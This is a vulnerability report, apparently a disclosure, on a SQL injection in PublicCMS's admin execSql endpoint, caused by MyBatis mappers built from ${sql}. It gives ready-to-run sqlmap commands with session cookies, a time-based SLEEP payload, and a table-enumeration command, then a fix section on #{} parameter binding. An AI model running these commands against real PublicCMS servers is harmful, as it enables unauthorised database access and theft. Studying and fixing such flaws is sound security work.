This is a database maintenance function for super administrators.
It is not an ordinary SQL query: it has a SQL injection vulnerability that can cause not only information disclosure but also remote control of the server and installation of a backdoor.
Where the SQL injection vulnerability code appears:
com.publiccms.controller.admin.sys.SysSiteAdminController
@RequestMapping("execSql")
sqlService.update(sql) => SqlMapper.xml

<mapper namespace="com.publiccms.logic.mapper.tools.SqlMapper">
    <select id="select" parameterType="String" resultType="map">${sql}</select>
    <select id="query" parameterType="String" resultType="map">${sql}</select>
    <insert id="insert" parameterType="String">${sql}</insert>
    <update id="update" parameterType="String">${sql}</update>
    <delete id="delete" parameterType="String">${sql}</delete>
</mapper>

URL address: http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql
POST data: "_csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=111221"
The 'sql' parameter is not filtered and is fully controllable by the caller.
We can use sqlmap to test the vulnerability:
python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "PUBLICCMS_ADMIN=1_353b342a-075c-4a71-9f13-c20e5b30b603; JSESSIONID=BBA83A42D2455445CFE0A504F287C9DB; Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=111221" --level 3 --dbms mysql
sqlmap identified the following injection point(s) with a total of 751 HTTP(s) requests:
Parameter: sql (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: _csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=(SELECT * FROM (SELECT(SLEEP(5)))CKuT)
[20:45:23] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0.12
View the tables in the PublicCMS database:

python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "JSESSIONID=70640223FE44003BC029AAAB54D24BC8; PUBLICCMS_ADMIN=1_2df43cfb-9546-4cdb-8150-6482f1b028de;Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=2df43cfb-9546-4cdb-8150-6482f1b028de&sql=111" --level 5 -D publiccms --tables
How to fix:
${} (unsafe usage)
A parameter passed in the ${foo} form takes part directly in SQL compilation, with the same effect as string concatenation, so it is open to SQL injection.
#{}
When #{} is used for parameter binding, MyBatis precompiles the SQL statement (a prepared statement with the value bound separately), which avoids SQL injection.
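As an added illustration of the ${} versus #{} distinction above (example code written for this note, not taken from PublicCMS; the mapper name SiteLookupMapper, the table sys_site and its columns are assumed):

```java
// Added example, not PublicCMS code: the same lookup written with ${} and with #{}.
// The table sys_site and the columns id, site_name, create_date are assumed.
import java.util.List;
import java.util.Map;
import java.util.Set;

import org.apache.ibatis.annotations.Param;
import org.apache.ibatis.annotations.Select;

public interface SiteLookupMapper {

    // UNSAFE: ${name} is pasted into the SQL text before MyBatis compiles it,
    // exactly like string concatenation. A quote character inside the value
    // terminates the literal and the remainder is parsed as SQL.
    @Select("SELECT id, site_name FROM sys_site WHERE site_name = '${name}'")
    List<Map<String, Object>> findByNameUnsafe(@Param("name") String name);

    // SAFE: #{name} becomes a JDBC '?' placeholder. MyBatis prepares the
    // statement and binds the value through PreparedStatement, so whatever the
    // caller passes is always treated as a string value, never as SQL text.
    @Select("SELECT id, site_name FROM sys_site WHERE site_name = #{name}")
    List<Map<String, Object>> findByName(@Param("name") String name);

    // ${} is only acceptable for parts of a statement that JDBC cannot bind,
    // such as a sort column, and then only after the value has been checked
    // against a fixed allow-list (see checkOrderBy below).
    @Select("SELECT id, site_name FROM sys_site ORDER BY ${orderBy}")
    List<Map<String, Object>> listOrdered(@Param("orderBy") String orderBy);

    // Assumed allow-list of sortable columns; call before listOrdered().
    Set<String> SORTABLE_COLUMNS = Set.of("id", "site_name", "create_date");

    static String checkOrderBy(String column) {
        if (!SORTABLE_COLUMNS.contains(column)) {
            throw new IllegalArgumentException("unsupported sort column: " + column);
        }
        return column;
    }
}
```

In XML mappers the change is the same: replace `${name}` with `#{name}` in the statement body and MyBatis emits a `?` placeholder. One caveat for the execSql case on this page: a mapper whose entire body is `${sql}` exists to run arbitrary statements, and JDBC cannot bind a whole statement as a parameter, so `#{}` alone cannot make that endpoint safe; such a feature has to be removed or strictly restricted, in addition to the super-administrator access control the report describes.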